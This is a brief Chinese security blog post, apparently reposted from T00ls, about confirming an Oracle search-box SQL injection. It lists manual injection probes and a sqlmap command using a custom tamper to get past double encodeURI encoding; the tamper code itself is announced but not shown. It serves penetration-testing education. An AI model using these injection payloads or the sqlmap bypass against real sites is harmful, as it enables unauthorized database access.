0x00 环境
遇到 一个搜索框
通过输入以下 内容:
123 返回正常
123%' and '%'=' 返回正常
123%' and '%'=' a 返回为空
123%‘-- 返回正常
123%' and (select 113 from dual)=123-- 返回正常
初步判定 为 oracle的 搜索型注入
0x01 遇到问题
按照一般的做法截包然后提交给 sqlmap,但是奇怪的sqlmap竟然无法识别出注入点
截包看了下手工注入的数据包,发现%变成了%2525
因此考虑到url编码了
然后查看源码
1 |
<code id= "code0" >&classcode= "+classcode+" &keyName="+encodeURI(encodeURI(keyName)));</code> |
果然是encodeURI编码,并且是两次
0x02 解决问题
查看了下sqlmap自带的tamper,好像还没有针对这种的编码
于是 找了个最简单的 tamper做模板,简单修改了下代码,代码如下
然后sqlmap加载改 tamper
sqlmap.py -r c:tmp1.txt -p keyName --random-agent --tamper urlencode2
sqlmap成功确认为 oracle注入
本文始发于微信公众号(T00ls):【奇技淫巧】编写简单tamper绕过encode编码
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论